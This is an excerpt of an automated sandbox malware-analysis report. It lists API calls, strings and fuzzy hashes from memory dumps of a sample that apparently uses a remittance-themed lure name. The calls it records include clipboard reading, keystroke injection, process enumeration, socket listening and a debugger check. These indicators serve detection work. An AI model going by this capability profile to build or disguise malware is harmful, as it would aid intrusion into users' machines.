                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                      • API String ID: 4194297153-14809454
                                                                      • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                      • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                      • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                      • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$_strncmp
                                                                      • String ID: @oH$\$^$h
                                                                      • API String ID: 2175499884-3701065813
                                                                      • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                      • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                      • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                      • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                      APIs
                                                                      • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                      • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                      • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                                      • String ID:
                                                                      • API String ID: 540024437-0
                                                                      • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                      • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                      • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                      • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                      • API String ID: 0-2872873767
                                                                      • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                      • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                      • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                      • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                      • __wsplitpath.LIBCMT ref: 00475644
                                                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                      • _wcscat.LIBCMT ref: 00475657
                                                                      • __wcsicoll.LIBCMT ref: 0047567B
                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                      • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                      • String ID:
                                                                      • API String ID: 2547909840-0
                                                                      • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                      • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                      • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                      • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                      APIs
                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                      • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                      • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                      • FindClose.KERNEL32(?), ref: 004525FF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                      • String ID: *.*$\VH
                                                                      • API String ID: 2786137511-2657498754
                                                                      • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                      • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                      • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                      • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                      APIs
                                                                      • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                      • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                      • String ID: pqI
                                                                      • API String ID: 2579439406-2459173057
                                                                      • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                      • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                      • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                      • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                      APIs
                                                                      • __wcsicoll.LIBCMT ref: 00433349
                                                                      • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                      • __wcsicoll.LIBCMT ref: 00433375
                                                                      • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __wcsicollmouse_event
                                                                      • String ID: DOWN
                                                                      • API String ID: 1033544147-711622031
                                                                      • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                      • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                      • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                      • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                      • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                      • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                      • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                      • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: KeyboardMessagePostState$InputSend
                                                                      • String ID:
                                                                      • API String ID: 3031425849-0
                                                                      • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                      • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                      • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                      • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                      APIs
                                                                        • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 4170576061-0
                                                                      • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                      • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                      • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                      • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                      APIs
                                                                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                      • IsWindowVisible.USER32 ref: 0047A368
                                                                      • IsWindowEnabled.USER32 ref: 0047A378
                                                                      • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                      • IsIconic.USER32 ref: 0047A393
                                                                      • IsZoomed.USER32 ref: 0047A3A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                      • String ID:
                                                                      • API String ID: 292994002-0
                                                                      • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                      • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                      • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                      • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                      APIs
                                                                        • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                      • CoInitialize.OLE32(00000000), ref: 00478442
                                                                      • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                      • CoUninitialize.OLE32 ref: 0047863C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                      • String ID: .lnk
                                                                      • API String ID: 886957087-24824748
                                                                      • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                      • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                      • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                      • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                      APIs
                                                                      • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                      • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                      • CloseClipboard.USER32 ref: 0046DD0D
                                                                      • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                      • CloseClipboard.USER32 ref: 0046DD41
                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                      • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                      • CloseClipboard.USER32 ref: 0046DD99
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                      • String ID:
                                                                      • API String ID: 15083398-0
                                                                      • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                      • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                      • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                      • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: U$\
                                                                      • API String ID: 4104443479-100911408
                                                                      • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                      • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                      • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                      • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstNext
                                                                      • String ID:
